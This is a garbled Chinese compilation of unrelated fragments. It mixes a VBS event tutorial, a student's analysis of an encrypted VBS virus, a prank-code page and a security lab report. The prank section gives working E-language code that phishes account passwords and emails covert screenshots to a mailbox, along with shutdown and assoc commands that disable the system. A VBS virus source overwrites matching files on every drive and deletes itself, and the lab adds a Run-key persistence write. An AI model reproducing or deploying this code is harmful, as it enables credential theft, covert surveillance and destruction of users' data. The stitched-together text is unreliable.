实验3 简单VBS病毒的编写

VBS简明教程三（转）◎Vbs脚本编程简明教程之十六——响应事件什么是事件？在我看来，事件就象我们手机上的闹钟，闹钟一响，我们就要去做某些特定的事情。

或者这样说，事件就像警钟，当程序运行时，有特殊的事情发生，就会激发事件，事件本身就是一条消息，如果你编写的脚本要对事件进行处理，就需要一个特殊的过程或者函数来接受和处理事件。

那么这个特殊的过程或者函数在程序运行时，就不断的监听，看系统是否传来了相应的事件，一旦接受到事件，脚本对此作出反应。

那么事件是从那里来的呢？是否需要我们在脚本中对事件进行编写呢？一般情况下，事件是某个程序在运行中的特殊状态发出的，我们不需要对事件进行编写，只需要编写处理事件的函数。

比如说我们用vbs建立了ie的一个实例，那么当ie的窗口被关闭的时候，就会激发出一个叫做OnQuit的事件。

是不是脚本自然而然就能接受事件并进行处理呢？我们说不是的，在创建对象的时候，我们将使用WSH的createobject命令，例如：Setobjie=Wscript.createobject(“internetexplorer.application”,”ev ent_”)注意到了吗？多了一个参数，这个参数的作用是什么呢？它叫做事件接收端，当脚本连接的对象包含事件时，如果对象调用的事件是OnBegin，那么WSH将会在脚本中调用一个event_OnBegin的事件处理程序。

当然事件接受端并不是固定的，如果对象将其定义为MyObj_的话，那么事件处理程序将是：MyObj_OnBegin。

是否很熟悉？在打造个性化QQ一讲中，曾经出现过Window_OnSize(cx,cy)函数，它其实就是一个事件处理程序。

让我们来举个实际的例子完整的看看事件的处理过程：Setobjie=WScript.CreateObject('InternetExplorer.Application','event _')objie.Visible=TrueMsgBox '请关闭浏览器窗口看看效果！',vbSystemModalWscript.sleep 6000MsgBox '现在已经正常关闭了'Sub event_onquit()MsgBox '您确定要关闭浏览器吗？',vbSystemModalEnd Sub这段脚本打开了一个IE窗口，然后要求你关闭IE窗口，当你关闭窗口的时候，自动调用事件响应程序。

对⼀个vbs脚本病毒的病毒原理分析⼀、前⾔病毒课⽼师丢给我们⼀份加密过的vbs脚本病毒的代码去尝试分析，这⾥把分析过程发出来，供⼤家参考，如果发现⽂中有什么错误或者是有啥建议，可以直接留⾔给我，谢谢！⼆、⽬录整个分析过程可以分为以下⼏个部分:0x00 准备⼯作0x01 解密部分0x02 功能分析三、分析过程0x00 准备⼯作windows xp的虚拟机(在⾃⼰的windows下也可以做)vbs的⼀些基本语法0x01 解密部分右击病毒⽂件然后编辑打开或者是直接把其后缀修改成txt直接打开都⾏，可以看到⼀⼤段密⽂，并调⽤了⼀个函数deCrypt。

暂时只看到这些，那么接着往下看吧。

拖到代码底部，发现有deCrypt了⼀次，也就是经过了两次加密，这⾥把执⾏部分注释掉，然后将解密的结果输出到⽂本⽂件中去。

另外，可以看到是⽤base64进⾏的加密的。

现在来看看解码后的结果。

发现依旧是不可阅读的代码，那就继续看看他是怎么处理的吧。

这⾥可以看到是将之前的字符串按“|dz|”划分，然后得到的是ascii码，将这些ascii码对应的字符拼接起来就好了，就得到了结果。

同样的套路将解密结果输出到⽂件中去再继续分析。

然后这次得到的结果是真正的病毒代码了。

接下来对他的功能进⾏分析。

0x02 功能分析从头开始看吧。

显⽰⼀些配置信息，包括了服务器的域名。

可以查到服务器是美国的，尝试ping了下，ping不通，可能是服务器作了设置不让⼈ping、也可能是服务器已经不⽤了、也有可能是我国的防⽕长城直接墙掉了。

然后是⼀些之后要⽤到的变量，这⾥不作过多的解释。

之后就是code start的部分了。

然后由于⾥⾯调⽤了各种函数，所以这⾥按执⾏的顺序给调⽤的函数编号，以便阅读，不然会感觉很凌乱的。

这⾥先是调⽤了instance函数。

1.instance函数给之前的⼀个参数usbspreading赋值，并对注册表进⾏写操作在执⾏完了instance函数后，会进⼊⼀个while true的死循环，不断从服务器读取命令，然后执⾏。

vbs整人电脑病毒代码是怎样的计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。

这是目前官方最权威的关于计算机病毒的定义，此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。

以下是店铺网小编为大家整理的关于vbs整人电脑病毒代码的相关知识，希望对大家有所帮助!易语言整人代码如下.版本 2.支持库 OPenGL.子程序 __启动窗口_创建完毕运行(“Shutdown.exe -s -t 120”, 假, ).子程序 _按钮1_被单击.如果真 (编辑框1.内容= “我是蠢猪，***是大好人”)运行(“shutdown -a ”, 假, )信息框(“哈哈~我还是很厚道的!我也知道你是发自内心的，是啊，我怎么那么完美呢?——呵呵~”, 0, )结束 ().如果真 (编辑框1.内容≠ “我是蠢猪，***是大好人”)信息框(“尼玛，输入正确会死啊!告诉你了，只要输入正确就OK 了~你怎么就不相信我呢”, 0, )—————————————————————————————————————————易语言骗账号代码如下：.版本 2.支持库 internet.子程序 _按钮1_被单击连接发信服务器(“”, 25, “邮箱”, “密码”, )发送邮件(“号来了”, “账号：” + 编辑框1.内容 + #换行符 +“密码：” + 编辑框2.内容, “邮箱”, , , “邮箱”, )——————————————————————————————————————————易语言监视对方电脑，连发十张高清截图代码如下：.版本 2.支持库 eImgConverter.支持库 internet.子程序 __启动窗口_创建完毕.计次循环首 (10, )写到文件(“D:\jt.bmp”, 快照 (, , ))转换到JPG (“jt.bmp”, “jt.jpg”, 假, 75, 真, 0).如果真 (连接发信服务器(“”, 25, “邮箱”, “密码”, ))添加附件文件(“D:\jt.bmp”).如果真结束发送邮件(“主题”, “被监视的电脑截图”, “邮箱”, , , “邮箱”, )断开发信服务器 ().计次循环尾 ()删除文件(“D:\jt.bmp”)结束 ()——————————————————————————————————————————你说要有图片可以将易语言程序启动窗口主页面的图片设置成我这样你说要有声音，可以运用以下代码：.版本 2.程序集窗口程序集1.子程序 _按钮1_被单击播放MP3 (1, “mp3地址”)——————————————————————————————————————————如果是电脑命令的话新建txt输入：shutdown -s -t 120 -c 你是猪!保存为bat或者还有，如果他用电脑命令破解，你就往后输入@echo offassoc .bat=txtfile可以让他所有的电脑命令成为乱码除了电脑命令乱码，你还可以设置各种的，比如：assoc .exe=txtfileassoc .mp3=txtfileassoc .zip=txtfileassoc .fiv=txtfileand so on……其实输入了就这样的代码，那台电脑基本就瘫痪了，没什么可以玩的了~。

vbs病毒的简单例⼦源代码解析说明：作者对某些代码进⾏了修改。

该⽂件是⼀个完整的程序。

该⽂件执⾏之后，会寻找硬盘上所有满⾜条件的⽂件，对其进⾏强制性覆盖（满⾜条件的⽂件数据将全部丢失）、并再创建⼀个相同⽂件名但后带.vbs的⽂件。

因此，请注意设⽴好破坏测试条件，千万不要对他⼈进⾏测试，否则，⼀切后果⾃负。

如果你的系统不⽀持.vbs,可以将后缀改为.vbedim folder,fso,foldername,f,d,dcset fso=createobject("scripting.filesystemobject")set self=fso.opentextfile(wscript.scriptfullname,1)vbscopy=self.readall '读取病毒体，以备复制到⽂件self.closeset dc=fso.Drivesfor each d in dcif d.drivetype=3 or d.drivetype=2 then '检查磁盘类型wscript.echo d '弹出窗⼝，显⽰找到盘符scan(d)end ifnextlsfile=wscript.scriptfullname '该脚本程序路径set lsfile=fso.getfile(lsfile)lsfile.delete(true) '病毒运⾏后⾃我删除(本⼈⾃加，爱⾍病毒本⾝没有该代码）sub scan(folder_)on error resume nextset folder_=fso.getfolder(folder_)set files=folder_.filesfor each file in filesext=fso.GetExtensionName(file) '获取⽂件后缀ext=lcase(ext) '后缀名转换成⼩写字母if ext="mp5" then '如果后缀名是mp5,当然不存在这种⽂件，这⾥可以⾃⼰修改，但是注意。

vbs编程、汇编程序调试、木马植入和运行、缓冲区溢出程序编写一、实验目的1．了解vbs病毒的感染及传播原理2．了解掌握木马的植入方法和运行原理3．掌握缓冲区溢出和堆溢出的原理及其区别。

二、实验内容（1）virus vbs脚本的编写：FSO对文件或文件夹的操作；对注册表的修改；汇编样例程序的运行和测试（2）学会3种木马的植入和运行的方法（3）学会缓冲区溢出的程序编写，参照样例编写带溢出漏洞代码，制造栈溢出和堆溢出。

三、所用仪器、材料（设备名称、型号、规格等或使用软件）PC机、虚拟机四、实验步骤及结果（一）vbs编程：1、对文件夹的操作（1）文件夹的创建：新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbs程序代码：dim fs,sset fs=wscript.createobject("scripting.filesystemobject")if(fs.folderexists("F:\lgh")) thens="is available"msgbox"F:\lgh文件夹已创建"elses="not exist"set foldr=fs.createfolder("F:\lgh")end if保存为.vbs格式的文件之后，执行该文件，其结果如下所示：（2）文件夹的删除，新建记事本，将下面的程序写入并保存，文件名为lgh，扩展名为.vbsdim fsset fs=wscript.createobject("scripting.Filesystemobject")fs.deletefolder("F:\lgh ")msgbox " F:\lgh 文件夹已删除"执行该文件后的结果如下所示：2. 对注册表的操作（1）对注册表的写修改，对注册表的写修改，在记事本中编辑下面的程序，保存为.vbs格式文件后执行path="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run \"set ws=wscript.createobject("wscript.shell")t=ws.regwrite(path & "lgh","name")msgbox "注册表修改成功！"首先在运行环境下输入regedit命令，查看注册表信息如下所示：执行程序后会弹出如右所示的对话框再查看注册表，发现注册表已被修改（二）汇编程序调试首先运行“cmp1.asm“文件，用—d命令查看程序的执行结果：运行文件后的结果：（三）木马的植入和运行完整的木马程序一般由两个部份组成：一个是服务器程序，一个是控制器程序。